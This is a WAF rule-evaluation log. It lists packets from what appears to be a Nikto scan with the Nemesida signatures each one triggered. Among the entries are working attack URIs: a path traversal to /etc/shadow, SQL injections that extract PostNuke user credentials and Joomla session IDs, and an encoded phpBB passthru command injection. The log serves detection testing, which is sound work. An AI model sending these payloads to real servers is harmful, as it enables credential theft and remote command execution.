# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l sql_injection.uri -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/inspectorlog/nemesida/conf_personalizada/web_dinamica/owasp/opensource/nikto/sql_injection.clean
Packet [1]	Uri [/web/192.168.1.war]	Nattacks [1]	Signatures	[300001516]
Packet [6]	Uri [/web/192.168.1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [7]	Uri [/web/192.168.1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [14]	Uri [/web/1921681104.sql]	Nattacks [1]	Signatures	[300001526]
Packet [15]	Uri [/web/1921681104.sql]	Nattacks [1]	Signatures	[300001526]
Packet [24]	Uri [/web/1921681.war]	Nattacks [1]	Signatures	[300001516]
Packet [25]	Uri [/web/1921681.war]	Nattacks [1]	Signatures	[300001516]
Packet [36]	Uri [/web/1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [37]	Uri [/web/1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [38]	Uri [/web/backup.tar.gz]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [39]	Uri [/web/backup.tar.gz]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [48]	Uri [/web/192.pem]	Nattacks [1]	Signatures	[300001925]
Packet [49]	Uri [/web/192.pem]	Nattacks [1]	Signatures	[300001925]
Packet [62]	Uri [/web/site.sql]	Nattacks [1]	Signatures	[300001526]
Packet [63]	Uri [/web/site.sql]	Nattacks [1]	Signatures	[300001526]
Packet [66]	Uri [/web/192.168.war]	Nattacks [1]	Signatures	[300001516]
Packet [67]	Uri [/web/192.168.war]	Nattacks [1]	Signatures	[300001516]
Packet [70]	Uri [/web/168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [71]	Uri [/web/168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [72]	Uri [/web/104.sql]	Nattacks [1]	Signatures	[300001526]
Packet [73]	Uri [/web/104.sql]	Nattacks [1]	Signatures	[300001526]
Packet [78]	Uri [/web/192_168_1_104.war]	Nattacks [1]	Signatures	[300001516]
Packet [79]	Uri [/web/192_168_1_104.war]	Nattacks [1]	Signatures	[300001516]
Packet [128]	Uri [/web/1.war]	Nattacks [1]	Signatures	[300001516]
Packet [129]	Uri [/web/1.war]	Nattacks [1]	Signatures	[300001516]
Packet [132]	Uri [/web/192.168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [133]	Uri [/web/192.168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [144]	Uri [/web/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [145]	Uri [/web/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [146]	Uri [/web/index.pl]	Nattacks [1]	Signatures	[300001513]
Packet [154]	Uri [/web/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [165]	Uri [/web/admin.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [166]	Uri [/web/administrator.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [167]	Uri [/web/authLogin.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [169]	Uri [/web/banner.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [170]	Uri [/web/book.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [171]	Uri [/web/cgiinfo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [172]	Uri [/web/cgitest.py]	Nattacks [1]	Signatures	[300001513]
Packet [174]	Uri [/web/contact.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [175]	Uri [/web/count.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [176]	Uri [/web/defaultwebpage.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [177]	Uri [/web/download.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [178]	Uri [/web/entropysearch.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [179]	Uri [/web/env.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [180]	Uri [/web/environment.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [182]	Uri [/web/formmail.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [183]	Uri [/web/FormMail-clone.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [184]	Uri [/web/guestbook.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [185]	Uri [/web/helpdesk.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [186]	Uri [/web/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [188]	Uri [/web/index.pl]	Nattacks [1]	Signatures	[300001513]
Packet [189]	Uri [/web/info.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [191]	Uri [/web/loadpage.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [192]	Uri [/web/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [194]	Uri [/web/login.pl]	Nattacks [1]	Signatures	[300001513]
Packet [195]	Uri [/web/pathtest.pl]	Nattacks [1]	Signatures	[300001513]
Packet [200]	Uri [/web/php.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [202]	Uri [/web/printenv]	Nattacks [1]	Signatures	[300001826]
Packet [203]	Uri [/web/restore_config.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [204]	Uri [/web/ruby.rb]	Nattacks [1]	Signatures	[300001505]
Packet [206]	Uri [/web/search.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [209]	Uri [/web/sysinfo.pl]	Nattacks [1]	Signatures	[300001513]
Packet [212]	Uri [/web/test.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [215]	Uri [/web/test_cgi.pl]	Nattacks [1]	Signatures	[300001513]
Packet [216]	Uri [/web/test-cgi.pl]	Nattacks [1]	Signatures	[300001513]
Packet [217]	Uri [/web/test.py]	Nattacks [1]	Signatures	[300001513]
Packet [219]	Uri [/web/tmUnblock.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [220]	Uri [/web/uname.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [221]	Uri [/web/viewcvs.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [223]	Uri [/web/whois.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [225]	Uri [/web/../../../../../../../../../../../../etc/shadow]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [229]	Uri [/web/cfappman/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [230]	Uri [/web/cfdocs/examples/cvbeans/beaninfo.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [231]	Uri [/web/cfdocs/examples/parks/detail.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [252]	Uri [/web/postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*]	Nattacks [6]	Signatures	[300000031]	[300000039]	[300000040]	[300001024]	[300001130]	[300001132]
Packet [253]	Uri [/web/postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*]	Nattacks [6]	Signatures	[300000031]	[300000039]	[300000040]	[300001024]	[300001130]	[300001132]
Packet [254]	Uri [/web/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=]	Nattacks [1]	Signatures	[300001359]
Packet [256]	Uri [/web/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*]	Nattacks [6]	Signatures	[300000031]	[300000039]	[300000040]	[300001024]	[300001130]	[300001132]
Packet [259]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [260]	Uri [/web/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [261]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [262]	Uri [/web/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [263]	Uri [/web/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [264]	Uri [/web/modules/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [265]	Uri [/web/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [266]	Uri [/web/forum/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [267]	Uri [/web/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [268]	Uri [/web/postnuke/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [269]	Uri [/web/postnuke/html/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [270]	Uri [/web/modules/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [271]	Uri [/web/phpBB/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [272]	Uri [/web/forum/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [273]	Uri [/web/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [274]	Uri [/web/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [275]	Uri [/web/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [276]	Uri [/web/modules/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [277]	Uri [/web/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [278]	Uri [/web/forum/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [279]	Uri [/web/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [280]	Uri [/web/postnuke/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [281]	Uri [/web/postnuke/html/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [282]	Uri [/web/modules/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [283]	Uri [/web/phpBB/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [284]	Uri [/web/forum/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [285]	Uri [/web/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [286]	Uri [/web/postnuke/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [287]	Uri [/web/postnuke/html/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [288]	Uri [/web/modules/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [289]	Uri [/web/phpBB/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [290]	Uri [/web/forum/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [291]	Uri [/web/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [292]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [293]	Uri [/web/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [294]	Uri [/web/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [295]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [296]	Uri [/web/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [297]	Uri [/web/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [298]	Uri [/web/modules/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [299]	Uri [/web/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [300]	Uri [/web/forum/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [301]	Uri [/web/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [302]	Uri [/web/postnuke/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [303]	Uri [/web/postnuke/html/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [304]	Uri [/web/modules/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [305]	Uri [/web/phpBB/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [306]	Uri [/web/forum/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [307]	Uri [/web/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [308]	Uri [/web/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [309]	Uri [/web/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [310]	Uri [/web/modules/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [311]	Uri [/web/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [312]	Uri [/web/forum/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [313]	Uri [/web/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [314]	Uri [/web/postnuke/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [315]	Uri [/web/postnuke/html/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [316]	Uri [/web/modules/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [317]	Uri [/web/phpBB/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [318]	Uri [/web/forum/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [319]	Uri [/web/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [320]	Uri [/web/postnuke/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [321]	Uri [/web/postnuke/html/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [322]	Uri [/web/modules/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [323]	Uri [/web/phpBB/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [324]	Uri [/web/forum/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [325]	Uri [/web/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [328]	Uri [/web/reademail.pl]	Nattacks [1]	Signatures	[300001513]
Packet [339]	Uri [/web/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)]	Nattacks [5]	Signatures	[300001007]	[300001024]	[300001086]	[300001109]	[300001116]
# N. packets [350], [147] with alerts, N. Alerts [170]
# Execution time: 0.406416 s
